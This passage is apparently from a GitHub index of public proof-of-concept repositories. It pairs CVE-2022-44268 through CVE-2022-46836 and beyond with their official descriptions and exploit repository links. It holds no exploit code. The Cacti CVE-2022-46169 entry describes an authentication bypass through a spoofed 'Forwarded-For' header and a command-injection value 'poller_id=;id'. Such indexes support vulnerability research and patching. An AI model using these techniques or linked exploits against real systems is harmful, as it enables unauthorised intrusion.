- [CygnusX-26/CVE-2022-44268-fixed-PoC](https://github.com/CygnusX-26/CVE-2022-44268-fixed-PoC)
- [PanAdamski/CVE-2022-44268-automated](https://github.com/PanAdamski/CVE-2022-44268-automated)
- [FlojBoj/CVE-2022-44268](https://github.com/FlojBoj/CVE-2022-44268)
### CVE-2022-44276 (2023-06-28)
In Responsive Filemanager < 9.12.0, an attacker can bypass upload restrictions resulting in RCE.
- [HerrLeStrate/CVE-2022-44276-PoC](https://github.com/HerrLeStrate/CVE-2022-44276-PoC)
### CVE-2022-44311 (2022-11-08)
html2xhtml v1.3 was discovered to contain an Out-Of-Bounds read in the function static void elm_close(tree_node_t *nodo) at procesador.c. This vulnerability allows attackers to access sensitive files or cause a Denial of Service (DoS) via a crafted html file.
- [Halcy0nic/CVE-2022-44311](https://github.com/Halcy0nic/CVE-2022-44311)
- [DesmondSanctity/CVE-2022-44311](https://github.com/DesmondSanctity/CVE-2022-44311)
### CVE-2022-44312 (2022-11-08)
PicoC Version 3.2.2 was discovered to contain a heap buffer overflow in the ExpressionCoerceInteger function in expression.c when called from ExpressionInfixOperator.
- [Halcy0nic/CVEs-for-picoc-3.2.2](https://github.com/Halcy0nic/CVEs-for-picoc-3.2.2)
### CVE-2022-44318 (2022-11-08)
PicoC Version 3.2.2 was discovered to contain a heap buffer overflow in the StringStrcat function in cstdlib/string.c when called from ExpressionParseFunctionCall.
- [Halcy0nic/CVE-2022-44318](https://github.com/Halcy0nic/CVE-2022-44318)
### CVE-2022-44569 (2023-11-03)
A locally authenticated attacker with low privileges can bypass authentication due to insecure inter-process communication.
- [rweijnen/ivanti-automationmanager-exploit](https://github.com/rweijnen/ivanti-automationmanager-exploit)
### CVE-2022-44666 (2022-12-13)
Windows Contacts Remote Code Execution Vulnerability
- [j00sean/CVE-2022-44666](https://github.com/j00sean/CVE-2022-44666)
### CVE-2022-44721
- [gmh5225/CVE-2022-44721-CsFalconUninstaller](https://github.com/gmh5225/CVE-2022-44721-CsFalconUninstaller)
### CVE-2022-44789 (2022-11-23)
A logical issue in O_getOwnPropertyDescriptor() in Artifex MuJS 1.0.0 through 1.3.x before 1.3.2 allows an attacker to achieve Remote Code Execution through memory corruption, via the loading of a crafted JavaScript file.
- [alalng/CVE-2022-44789](https://github.com/alalng/CVE-2022-44789)
### CVE-2022-44830 (2022-11-21)
Sourcecodester Event Registration App v1.0 was discovered to contain multiple CSV injection vulnerabilities via the First Name, Contact and Remarks fields. These vulnerabilities allow attackers to execute arbitrary code via a crafted excel file.
- [RashidKhanPathan/CVE-2022-44830](https://github.com/RashidKhanPathan/CVE-2022-44830)
### CVE-2022-44870 (2023-01-06)
A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module.
- [Cedric1314/CVE-2022-44870](https://github.com/Cedric1314/CVE-2022-44870)
### CVE-2022-44875 (2023-03-06)
KioWare through 8.33 on Windows sets KioScriptingUrlACL.AclActions.AllowHigh for the about:blank origin, which allows attackers to obtain SYSTEM access via KioUtils.Execute in JavaScript code.
- [AesirSec/CVE-2022-44875-Test](https://github.com/AesirSec/CVE-2022-44875-Test)
### CVE-2022-44877 (2023-01-05)
login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.
- [numanturle/CVE-2022-44877](https://github.com/numanturle/CVE-2022-44877)
- [komomon/CVE-2022-44877-RCE](https://github.com/komomon/CVE-2022-44877-RCE)
- [ColdFusionX/CVE-2022-44877-CWP7](https://github.com/ColdFusionX/CVE-2022-44877-CWP7)
- [Chocapikk/CVE-2022-44877](https://github.com/Chocapikk/CVE-2022-44877)
- [hotpotcookie/CVE-2022-44877-white-box](https://github.com/hotpotcookie/CVE-2022-44877-white-box)
- [RicYaben/CVE-2022-44877-LAB](https://github.com/RicYaben/CVE-2022-44877-LAB)
- [dkstar11q/CVE-2022-44877](https://github.com/dkstar11q/CVE-2022-44877)
- [rhymsc/CVE-2022-44877-RCE](https://github.com/rhymsc/CVE-2022-44877-RCE)
- [G01d3nW01f/CVE-2022-44877](https://github.com/G01d3nW01f/CVE-2022-44877)
### CVE-2022-44900 (2022-12-06)
A directory traversal vulnerability in the SevenZipFile.extractall() function of the python library py7zr v0.20.0 and earlier allows attackers to write arbitrary files via extracting a crafted 7z file.
- [0xless/CVE-2022-44900-demo-lab](https://github.com/0xless/CVE-2022-44900-demo-lab)
### CVE-2022-45003 (2023-03-22)
Gophish through 0.12.1 allows attackers to cause a Denial of Service (DoS) via a crafted payload involving autofocus.
- [mha98/CVE-2022-45003](https://github.com/mha98/CVE-2022-45003)
### CVE-2022-45004 (2023-03-22)
Gophish through 0.12.1 was discovered to contain a cross-site scripting (XSS) vulnerability via a crafted landing page.
- [mha98/CVE-2022-45004](https://github.com/mha98/CVE-2022-45004)
### CVE-2022-45025 (2022-12-07)
Markdown Preview Enhanced v0.6.5 and v0.19.6 for VSCode and Atom was discovered to contain a command injection vulnerability via the PDF file import function.
- [yuriisanin/CVE-2022-45025](https://github.com/yuriisanin/CVE-2022-45025)
- [andyhsu024/CVE-2022-45025](https://github.com/andyhsu024/CVE-2022-45025)
### CVE-2022-45047 (2022-11-16)
Class org.apache.sshd.server.keyprovider.SimpleGeneratorHostKeyProvider in Apache MINA SSHD <= 2.9.1 uses Java deserialization to load a serialized java.security.PrivateKey. The class is one of several implementations that an implementor using Apache MINA SSHD can choose for loading the host keys of an SSH server.
- [hktalent/CVE-2022-45047](https://github.com/hktalent/CVE-2022-45047)
### CVE-2022-45059 (2022-11-09)
An issue was discovered in Varnish Cache 7.x before 7.1.2 and 7.2.x before 7.2.1. A request smuggling attack can be performed on Varnish Cache servers by requesting that certain headers are made hop-by-hop, preventing the Varnish Cache servers from forwarding critical headers to the backend.
- [martinvks/CVE-2022-45059-demo](https://github.com/martinvks/CVE-2022-45059-demo)
### CVE-2022-45217 (2022-12-07)
A cross-site scripting (XSS) vulnerability in Book Store Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Level parameter under the Add New System User module.
- [sudoninja-noob/CVE-2022-45217](https://github.com/sudoninja-noob/CVE-2022-45217)
### CVE-2022-45265
- [maikroservice/CVE-2022-45265](https://github.com/maikroservice/CVE-2022-45265)
### CVE-2022-45299 (2023-01-13)
An issue in the IpFile argument of rust-lang webbrowser-rs v0.8.2 allows attackers to access arbitrary files via supplying a crafted URL.
- [offalltn/CVE-2022-45299](https://github.com/offalltn/CVE-2022-45299)
### CVE-2022-45354 (2024-01-08)
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in WPChill Download Monitor.This issue affects Download Monitor: from n/a through 4.7.60.\n\n
- [RandomRobbieBF/CVE-2022-45354](https://github.com/RandomRobbieBF/CVE-2022-45354)
### CVE-2022-45436 (2023-02-15)
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artica PFMS Pandora FMS v765 on all platforms, allows Cross-Site Scripting (XSS). As a manager privilege user , create a network map containing name as xss payload. Once created, admin user must click on the edit network maps and XSS payload will be executed, which could be used for stealing admin users cookie value.\n\n
- [damodarnaik/CVE-2022-45436](https://github.com/damodarnaik/CVE-2022-45436)
### CVE-2022-45451 (2023-08-31)
Local privilege escalation due to insecure driver communication port permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40173, Acronis Agent (Windows) before build 30600, Acronis Cyber Protect 15 (Windows) before build 30984.
- [alfarom256/CVE-2022-45451](https://github.com/alfarom256/CVE-2022-45451)
### CVE-2022-45472 (2022-11-23)
CAE LearningSpace Enterprise (with Intuity License) image 267r patch 639 allows DOM XSS, related to ontouchmove and onpointerup.
- [nicbrinkley/CVE-2022-45472](https://github.com/nicbrinkley/CVE-2022-45472)
### CVE-2022-45477 (2022-12-05)
Telepad allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- [M507/nmap-vulnerability-scan-scripts](https://github.com/M507/nmap-vulnerability-scan-scripts)
### CVE-2022-45511 (2022-12-08)
Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the PPPOEPassword parameter at /goform/QuickIndex.
- [kinderscsaa/cve-2022-45511](https://github.com/kinderscsaa/cve-2022-45511)
### CVE-2022-45544 (2023-02-07)
Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter. NOTE: this is disputed by the vendor because an admin is intentionally allowed to upload new executable PHP code, such as a theme that was obtained from a trusted source or was developed for their own website. Only an admin can upload such code, not someone else in an "attacker" role.
- [tristao-marinho/CVE-2022-45544](https://github.com/tristao-marinho/CVE-2022-45544)
### CVE-2022-45599 (2023-02-22)
Aztech WMB250AC Mesh Routers Firmware Version 016 2020 is vulnerable to PHP Type Juggling in file /var/www/login.php, allows attackers to gain escalated privileges only when specific conditions regarding a given accounts hashed password.
- [ethancunt/CVE-2022-45599](https://github.com/ethancunt/CVE-2022-45599)
### CVE-2022-45600 (2023-02-22)
Aztech WMB250AC Mesh Routers Firmware Version 016 2020 devices improperly manage sessions, which allows remote attackers to bypass authentication in opportunistic circumstances and execute arbitrary commands with administrator privileges by leveraging an existing web portal login.
- [ethancunt/CVE-2022-45600](https://github.com/ethancunt/CVE-2022-45600)
### CVE-2022-45688 (2022-12-13)
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.
- [scabench/jsonorg-tp1](https://github.com/scabench/jsonorg-tp1)
- [scabench/jsonorg-fp1](https://github.com/scabench/jsonorg-fp1)
- [scabench/jsonorg-fp2](https://github.com/scabench/jsonorg-fp2)
- [scabench/jsonorg-fp3](https://github.com/scabench/jsonorg-fp3)
- [scabench/jsonorg-fn1](https://github.com/scabench/jsonorg-fn1)
### CVE-2022-45701 (2023-02-17)
Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature.
- [yerodin/CVE-2022-45701](https://github.com/yerodin/CVE-2022-45701)
- [geniuszlyy/CVE-2022-45701](https://github.com/geniuszlyy/CVE-2022-45701)
### CVE-2022-45728 (2023-01-12)
Doctor Appointment Management System v1.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability.
- [sudoninja-noob/CVE-2022-45728](https://github.com/sudoninja-noob/CVE-2022-45728)
### CVE-2022-45729 (2023-01-12)
A cross-site scripting (XSS) vulnerability in Doctor Appointment Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Employee ID parameter.
- [sudoninja-noob/CVE-2022-45729](https://github.com/sudoninja-noob/CVE-2022-45729)
### CVE-2022-45770 (2023-01-26)
Improper input validation in adgnetworkwfpdrv.sys in Adguard For Windows x86 through 7.11 allows local privilege escalation.
- [Marsel-marsel/CVE-2022-45770](https://github.com/Marsel-marsel/CVE-2022-45770)
### CVE-2022-45771 (2022-12-05)
An issue in the /api/audits component of Pwndoc v0.5.3 allows attackers to escalate privileges and execute arbitrary code via uploading a crafted audit file.
- [p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE](https://github.com/p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE)
- [yuriisanin/CVE-2022-45771](https://github.com/yuriisanin/CVE-2022-45771)
### CVE-2022-45808 (2023-01-24)
SQL Injection vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
- [RandomRobbieBF/CVE-2022-45808](https://github.com/RandomRobbieBF/CVE-2022-45808)
### CVE-2022-45934 (2022-11-27)
An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets.
- [Trinadh465/linux-4.19.72_CVE-2022-45934](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-45934)
- [Trinadh465/linux-4.1.15_CVE-2022-45934](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-45934)
- [Satheesh575555/linux-4.1.15_CVE-2022-45934](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-45934)
### CVE-2022-45988 (2023-03-03)
starsoftcomm CooCare 5.304 allows local attackers to escalate privileges and execute arbitrary commands via a crafted file upload.
- [happy0717/CVE-2022-45988](https://github.com/happy0717/CVE-2022-45988)
### CVE-2022-46080 (2023-07-06)
Nexxt Nebula 1200-AC 15.03.06.60 allows authentication bypass and command execution by using the HTTPD service to enable TELNET.
- [yerodin/CVE-2022-46080](https://github.com/yerodin/CVE-2022-46080)
- [geniuszlyy/CVE-2022-46080](https://github.com/geniuszlyy/CVE-2022-46080)
### CVE-2022-46087 (2023-01-30)
CloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notification received by the admin user.
- [G37SYS73M/CVE-2022-46087](https://github.com/G37SYS73M/CVE-2022-46087)
### CVE-2022-46104
- [NurSec747/CVE-2022-46104---POC](https://github.com/NurSec747/CVE-2022-46104---POC)
### CVE-2022-46164 (2022-12-05)
NodeBB is an open source Node.js based forum software. Due to a plain object with a prototype being used in socket.io message handling a specially crafted payload can be used to impersonate other users and takeover accounts. This vulnerability has been patched in version 2.6.1. Users are advised to upgrade. Users unable to upgrade may cherry-pick commit `48d143921753914da45926cca6370a92ed0c46b8` into their codebase to patch the exploit.\n
- [stephenbradshaw/CVE-2022-46164-poc](https://github.com/stephenbradshaw/CVE-2022-46164-poc)
### CVE-2022-46166 (2022-12-09)
Spring boot admins is an open source administrative user interface for management of spring boot applications. All users who run Spring Boot Admin Server, having enabled Notifiers (e.g. Teams-Notifier) and write access to environment variables via UI are affected. Users are advised to upgrade to the most recent releases of Spring Boot Admin 2.6.10 and 2.7.8 to resolve this issue. Users unable to upgrade may disable any notifier or disable write access (POST request) on `/env` actuator endpoint.\n\n
- [DickDock/CVE-2022-46166](https://github.com/DickDock/CVE-2022-46166)
### CVE-2022-46169 (2022-12-05)
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks serval `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry. After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. By e.g. providing the `poller_id=;id` the `id` command is executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with an `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a productive instance because this action is added by some predefined templates like `Device - Uptime` or `Device - Polling Time`.\n\nThis command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_...` `$_SERVER` variables. If these should be kept for compatibility reasons it should at least be prevented to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch.
- [imjdl/CVE-2022-46169](https://github.com/imjdl/CVE-2022-46169)
- [0xf4n9x/CVE-2022-46169](https://github.com/0xf4n9x/CVE-2022-46169)
- [taythebot/CVE-2022-46169](https://github.com/taythebot/CVE-2022-46169)
- [Inplex-sys/CVE-2022-46169](https://github.com/Inplex-sys/CVE-2022-46169)
- [sAsPeCt488/CVE-2022-46169](https://github.com/sAsPeCt488/CVE-2022-46169)
- [c3rrberu5/CVE-2022-46169](https://github.com/c3rrberu5/CVE-2022-46169)
- [Habib0x0/CVE-2022-46169](https://github.com/Habib0x0/CVE-2022-46169)
- [N1arut/CVE-2022-46169_POC](https://github.com/N1arut/CVE-2022-46169_POC)
- [miko550/CVE-2022-46169](https://github.com/miko550/CVE-2022-46169)
- [ariyaadinatha/cacti-cve-2022-46169-exploit](https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit)
- [doosec101/CVE-2022-46169](https://github.com/doosec101/CVE-2022-46169)
- [m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application](https://github.com/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application)
- [devAL3X/CVE-2022-46169_poc](https://github.com/devAL3X/CVE-2022-46169_poc)
- [JacobEbben/CVE-2022-46169_unauth_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46169_unauth_remote_code_execution)
- [icebreack/CVE-2022-46169](https://github.com/icebreack/CVE-2022-46169)
- [devilgothies/CVE-2022-46169](https://github.com/devilgothies/CVE-2022-46169)
- [yassinebk/CVE-2022-46169](https://github.com/yassinebk/CVE-2022-46169)
- [ruycr4ft/CVE-2022-46169](https://github.com/ruycr4ft/CVE-2022-46169)
- [FredBrave/CVE-2022-46169-CACTI-1.2.22](https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22)
- [sha-16/RCE-Cacti-1.2.22](https://github.com/sha-16/RCE-Cacti-1.2.22)
- [Safarchand/CVE-2022-46169](https://github.com/Safarchand/CVE-2022-46169)
- [MarkStrendin/CVE-2022-46169](https://github.com/MarkStrendin/CVE-2022-46169)
- [BKreisel/CVE-2022-46169](https://github.com/BKreisel/CVE-2022-46169)
- [Rickster5555/EH2-PoC](https://github.com/Rickster5555/EH2-PoC)
- [antisecc/CVE-2022-46169](https://github.com/antisecc/CVE-2022-46169)
- [dawnl3ss/CVE-2022-46169](https://github.com/dawnl3ss/CVE-2022-46169)
- [a1665454764/CVE-2022-46169](https://github.com/a1665454764/CVE-2022-46169)
- [0xZon/CVE-2022-46169-Exploit](https://github.com/0xZon/CVE-2022-46169-Exploit)
- [copyleftdev/PricklyPwn](https://github.com/copyleftdev/PricklyPwn)
- [0xN7y/CVE-2022-46169](https://github.com/0xN7y/CVE-2022-46169)
- [mind2hex/CVE-2022-46169](https://github.com/mind2hex/CVE-2022-46169)
- [HPT-Intern-Task-Submission/CVE-2022-46169](https://github.com/HPT-Intern-Task-Submission/CVE-2022-46169)
### CVE-2022-46175 (2022-12-24)
JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including versions 1.0.1 and 2.2.1 does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. `JSON5.parse` should restrict parsing of `__proto__` keys when parsing JSON strings to objects. As a point of reference, the `JSON.parse` method included in JavaScript ignores `__proto__` keys. Simply changing `JSON5.parse` to `JSON.parse` in the examples above mitigates this vulnerability. This vulnerability is patched in json5 versions 1.0.2, 2.2.2, and later.
- [giz-berlin/quasar-app-webpack-json5-vulnerability](https://github.com/giz-berlin/quasar-app-webpack-json5-vulnerability)
### CVE-2022-46196
- [dpgg101/CVE-2022-46196](https://github.com/dpgg101/CVE-2022-46196)
### CVE-2022-46381 (2022-12-13)
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
- [amitlttwo/CVE-2022-46381](https://github.com/amitlttwo/CVE-2022-46381)
### CVE-2022-46395 (2023-03-06)
An issue was discovered in the Arm Mali GPU Kernel Driver. A non-privileged user can make improper GPU processing operations to gain access to already freed memory. This affects Midgard r0p0 through r32p0, Bifrost r0p0 through r41p0 before r42p0, Valhall r19p0 through r41p0 before r42p0, and Avalon r41p0 before r42p0.
- [Pro-me3us/CVE_2022_46395_Gazelle](https://github.com/Pro-me3us/CVE_2022_46395_Gazelle)
- [Pro-me3us/CVE_2022_46395_Raven](https://github.com/Pro-me3us/CVE_2022_46395_Raven)
- [SmileTabLabo/CVE-2022-46395](https://github.com/SmileTabLabo/CVE-2022-46395)
### CVE-2022-46463 (2023-01-12)
An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication. NOTE: the vendor's position is that this "is clearly described in the documentation as a feature."
- [nu0l/CVE-2022-46463](https://github.com/nu0l/CVE-2022-46463)
- [404tk/CVE-2022-46463](https://github.com/404tk/CVE-2022-46463)
### CVE-2022-46484 (2023-08-02)
Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys.
- [WodenSec/CVE-2022-46484](https://github.com/WodenSec/CVE-2022-46484)
### CVE-2022-46485 (2023-08-02)
Data Illusion Survey Software Solutions ngSurvey version 2.4.28 and below is vulnerable to Denial of Service if a survey contains a "Text Field", "Comment Field" or "Contact Details".
- [WodenSec/CVE-2022-46485](https://github.com/WodenSec/CVE-2022-46485)
### CVE-2022-46505 (2023-01-18)
An issue in MatrixSSL 4.5.1-open and earlier leads to failure to securely check the SessionID field, resulting in the misuse of an all-zero MasterSecret that can decrypt secret data.
- [SmallTown123/details-for-CVE-2022-46505](https://github.com/SmallTown123/details-for-CVE-2022-46505)
### CVE-2022-46604 (2023-02-02)
An issue in Tecrail Responsive FileManager v9.9.5 and below allows attackers to bypass the file extension check mechanism and upload a crafted PHP file, leading to arbitrary code execution.
- [galoget/ResponsiveFileManager-CVE-2022-46604](https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604)
### CVE-2022-46622 (2023-01-12)
A cross-site scripting (XSS) vulnerability in Judging Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter.
- [sudoninja-noob/CVE-2022-46622](https://github.com/sudoninja-noob/CVE-2022-46622)
### CVE-2022-46623 (2023-01-12)
Judging Management System v1.0.0 was discovered to contain a SQL injection vulnerability via the username parameter.
- [sudoninja-noob/CVE-2022-46623](https://github.com/sudoninja-noob/CVE-2022-46623)
### CVE-2022-46638
- [naonymous101/CVE-2022-46638](https://github.com/naonymous101/CVE-2022-46638)
### CVE-2022-46689 (2022-12-15)
A race condition was addressed with additional validation. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges.
- [zhuowei/MacDirtyCowDemo](https://github.com/zhuowei/MacDirtyCowDemo)
- [ahkecha/McDirty](https://github.com/ahkecha/McDirty)
- [straight-tamago/NoCameraSound](https://github.com/straight-tamago/NoCameraSound)
- [ginsudev/WDBFontOverwrite](https://github.com/ginsudev/WDBFontOverwrite)
- [mineek/FileManager](https://github.com/mineek/FileManager)
- [straight-tamago/NoHomeBar](https://github.com/straight-tamago/NoHomeBar)
- [straight-tamago/DockTransparent](https://github.com/straight-tamago/DockTransparent)
- [straight-tamago/FileSwitcherX](https://github.com/straight-tamago/FileSwitcherX)
- [BomberFish/Mandela-Legacy](https://github.com/BomberFish/Mandela-Legacy)
- [BomberFish/JailedCement](https://github.com/BomberFish/JailedCement)
- [BomberFish/Mandela-Classic](https://github.com/BomberFish/Mandela-Classic)
- [enty8080/MacDirtyCow](https://github.com/enty8080/MacDirtyCow)
- [tdquang266/MDC](https://github.com/tdquang266/MDC)
- [69camau/sw1tch](https://github.com/69camau/sw1tch)
### CVE-2022-46718 (2023-06-23)
A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, macOS Monterey 12.6.2. An app may be able to read sensitive location information
- [biscuitehh/cve-2022-46718-leaky-location](https://github.com/biscuitehh/cve-2022-46718-leaky-location)
### CVE-2022-46836 (2023-02-20)
PHP code injection in watolib auth.php and hosttags.php in Tribe29's Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29 allows an attacker to inject and execute PHP code which will be executed upon request of the vulnerable component.
- [JacobEbben/CVE-2022-46836_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46836_remote_code_execution)
### CVE-2022-47102 (2023-01-12)
A cross-site scripting (XSS) vulnerability in Student Study Center Management System V 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.
- [sudoninja-noob/CVE-2022-47102](https://github.com/sudoninja-noob/CVE-2022-47102)
### CVE-2022-47130 (2023-02-03)
A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows a discount coupon to be arbitrarily created if an attacker with administrative privileges interacts on the CSRF page.
- [OpenXP-Research/CVE-2022-47130](https://github.com/OpenXP-Research/CVE-2022-47130)
### CVE-2022-47131 (2023-02-03)
A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows an attacker to arbitrarily create a page.
- [OpenXP-Research/CVE-2022-47131](https://github.com/OpenXP-Research/CVE-2022-47131)
### CVE-2022-47132 (2023-02-03)
A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows attackers to arbitrarily add Administrator users.
- [OpenXP-Research/CVE-2022-47132](https://github.com/OpenXP-Research/CVE-2022-47132)
### CVE-2022-47197 (2023-01-19)
An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_foot` for a post.
- [miguelc49/CVE-2022-47197-2](https://github.com/miguelc49/CVE-2022-47197-2)
- [miguelc49/CVE-2022-47197-1](https://github.com/miguelc49/CVE-2022-47197-1)
### CVE-2022-47373 (2023-02-15)
Reflected Cross Site Scripting in Search Functionality of Module Library in Pandora FMS Console v766 and lower. This vulnerability arises on the forget password functionality in which parameter username does not proper input validation/sanitization thus results in executing malicious JavaScript payload.
- [Argonx21/CVE-2022-47373](https://github.com/Argonx21/CVE-2022-47373)
### CVE-2022-47529 (2023-03-28)
Insecure Win32 memory objects in Endpoint Windows Agents in RSA NetWitness Platform before 12.2 allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.
- [hyp3rlinx/CVE-2022-47529](https://github.com/hyp3rlinx/CVE-2022-47529)
### CVE-2022-47615 (2023-01-24)
Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
- [RandomRobbieBF/CVE-2022-47615](https://github.com/RandomRobbieBF/CVE-2022-47615)
### CVE-2022-47872 (2023-02-01)
A Server-Side Request Forgery (SSRF) in maccms10 v2021.1000.2000 allows attackers to force the application to make arbitrary requests via a crafted payload injected into the Name parameter under the Interface address module.
- [Cedric1314/CVE-2022-47872](https://github.com/Cedric1314/CVE-2022-47872)
### CVE-2022-47909 (2023-02-20)
Livestatus Query Language (LQL) injection in the AuthUser HTTP query header of Tribe29's Checkmk <= 2.1.0p11, Checkmk <= 2.0.0p28, and all versions of Checkmk 1.6.0 (EOL) allows an attacker to perform direct queries to the application's core from localhost.
- [JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion](https://github.com/JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion)
### CVE-2022-47952 (2023-01-01)
lxc-user-nic in lxc through 5.0.1 is installed setuid root, and may allow local users to infer whether any file exists, even within a protected directory tree, because "Failed to open" often indicates that a file does not exist, whereas "does not refer to a network namespace path" often indicates that a file exists. NOTE: this is different from CVE-2018-6556 because the CVE-2018-6556 fix design was based on the premise that "we will report back to the user that the open() failed but the user has no way of knowing why it failed"; however, in many realistic cases, there are no plausible reasons for failing except that the file does not exist.
- [MaherAzzouzi/CVE-2022-47952](https://github.com/MaherAzzouzi/CVE-2022-47952)
### CVE-2022-47966 (2023-01-18)
